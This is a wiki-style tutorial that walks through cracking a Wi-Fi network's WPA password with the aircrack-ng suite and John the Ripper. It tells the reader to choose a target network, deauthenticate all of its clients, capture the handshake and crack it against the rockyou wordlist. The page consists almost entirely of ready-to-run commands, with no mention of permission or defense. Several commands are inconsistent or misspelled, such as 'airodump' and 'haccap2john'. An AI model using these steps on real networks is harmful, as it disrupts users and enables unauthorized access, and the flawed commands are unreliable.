From Void-Byte
Jump to navigation Jump to search

1.) Detect the currently attached Wireless Network Adapters.

Syntax: airmon-ng

Command: airmon-ng

2.) Switch the Wireless Network Adapter from Managed Mode to Monitor Mode.

Syntax: airmon-ng start <wireless adapter>

Command: airmon-ng start wlan0

!NOTE! You will now refer to wlan0 as wlan0mon !NOTE!

3.) Scan for wireless networks.

Syntax: airodump-ng <wireless adapter>+mon

Command: airodump-ng wlan0mon

!NOTE! You will find your target here. Record the BSSID, ESSID, and CHANNEL. !NOTE!

4a.) Collect the handshake from your target.

Syntax: airodump --bssid <BSSID> --channel <CHANNEL> --write <filename> <wireless adapter>

Command: airodump --bssid 00:00:00:00:00:00 --channel 1 --write myfile wlan0mon

4b.) Deauth all clients on the target.

Syntax: aireplay-ng --deauth <amount> -a <BSSID> <wireless adapter>

Command: aireplay-ng --deauth 30 -a 00:00:00:00:00:00 wlan0mon

!NOTE! After you see the handshake on the airodump screen you can stop both screens with CTRL+C. !NOTE!

5.) Convert the CAP file to HCCAP

Syntax: aircrack-ng <filename>.cap -J <filename>

Command: aircrack-ng myfile.cap -J myfile

!NOTE! Will generate a .hccap file called <filename>.hccap

6.) Convert the HCCAP to John compatible format.

Syntax: hccap2john <filename.cap> > <filename>

Command: haccap2john myfile.hccap > myfile

7.) Crack the password!

Syntax: john --wordlist=<wordlist location> <filename>

Command: john --wordlist=/usr/share/wordlists/rockyou.txt myfile

8.) Switch the Wireless Network Adapter from Monitor Mode to Managed Mode.

Syntax: airmon-ng stop <wireless adapter>+mon

Command: airmon-ng stop wlan0mon

9.) If you want to retrieve your password later.

Syntax: john --show <filename>

Command: john --show myfile